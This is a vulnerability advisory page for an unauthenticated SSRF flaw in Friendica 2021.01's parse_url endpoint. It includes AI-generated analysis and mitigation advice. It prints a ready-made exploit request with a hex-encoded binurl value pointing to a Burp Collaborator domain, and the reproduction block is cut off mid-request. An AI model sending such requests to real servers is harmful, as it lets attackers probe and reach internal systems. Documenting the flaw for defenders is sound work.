CVE-2021-27329
Description
Friendica 2021.01 is vulnerable to server-side request forgery (SSRF) via the parse_url endpoint, allowing unauthenticated attackers to perform arbitrary DNS lookups and HTTP requests.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Friendica 2021.01 is vulnerable to server-side request forgery (SSRF) via the parse_url endpoint, allowing unauthenticated attackers to perform arbitrary DNS lookups and HTTP requests.
Vulnerability
Friendica version 2021.01 contains a server-side request forgery (SSRF) vulnerability in the parse_url endpoint. The binurl parameter accepts a hex-encoded URL and triggers a DNS lookup and HTTP request to the specified domain without any authentication or validation [1]. This allows an attacker to force the server to make requests to arbitrary external or internal hosts.
Exploitation
An unauthenticated attacker can send a GET request to /parse_url?binurl= (e.g., 73767274703267776f7375713063623539706668336f69366a78706e64632e62757270636f6c6c61626f7261746f722e6e6574 for a Burp Collaborator domain) [1]. The server will perform a DNS lookup and an HTTP request to the decoded URL, and the response includes an attachment link pointing to that URL [1]. No user interaction or special privileges are required.
Impact
Successful exploitation allows the attacker to use the Friendica server as a proxy to attack other systems, including internal services within the same network or public third-party systems [1]. This can lead to information disclosure, further compromise of internal resources, or use of the server in distributed attacks.
Mitigation
The available reference does not provide a specific fix or patched version [1]. Users should monitor the Friendica project for updates and consider restricting access to the parse_url endpoint or implementing input validation as a workaround until a patch is released.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Friendica/Friendicadescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input validation on the `binurl` parameter in the `parse_url` endpoint allows arbitrary DNS lookups and HTTP requests."
Attack vector
An unauthenticated attacker sends a GET request to `/parse_url` with a `binurl` parameter containing a hex-encoded domain name (e.g., `73767274703267776f7375713063623539706668336f69366a78706e64632e62757270636f6c6c61626f7261746f722e6e6574`). The server decodes this value and performs a DNS lookup and HTTP request to the attacker-controlled domain, enabling server-side request forgery (SSRF) [ref_id=1]. No authentication is required to trigger the behavior [ref_id=1].
Affected code
The vulnerability exists in the `parse_url` endpoint of Friendica 2021.01. The `binurl` parameter is passed directly to functions that perform DNS lookups and HTTP requests without sufficient validation [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory recommends implementing a whitelist of permitted services and hosts, and blocking any interactions that do not appear on this whitelist. Additionally, the advisory suggests blocking network access from the application server to other internal systems and hardening the application server itself [ref_id=1].
Preconditions
- authNo authentication required; the endpoint is publicly accessible
- networkAttacker must be able to reach the Friendica instance over HTTP
- inputAttacker controls a domain that will receive the DNS lookup and HTTP request
Reproduction
Send the following request to a Friendica 2021.01 instance:
``` GET /parse_url?binurl=73767274703267776f7375713063623539706668336f69366a78706e64632e62757270636f6c6c61626f7261746f722e6e6574&_=1613263595343 HTTP/1.1 Host:
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- github.com/friendica/friendica/issues/9929mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.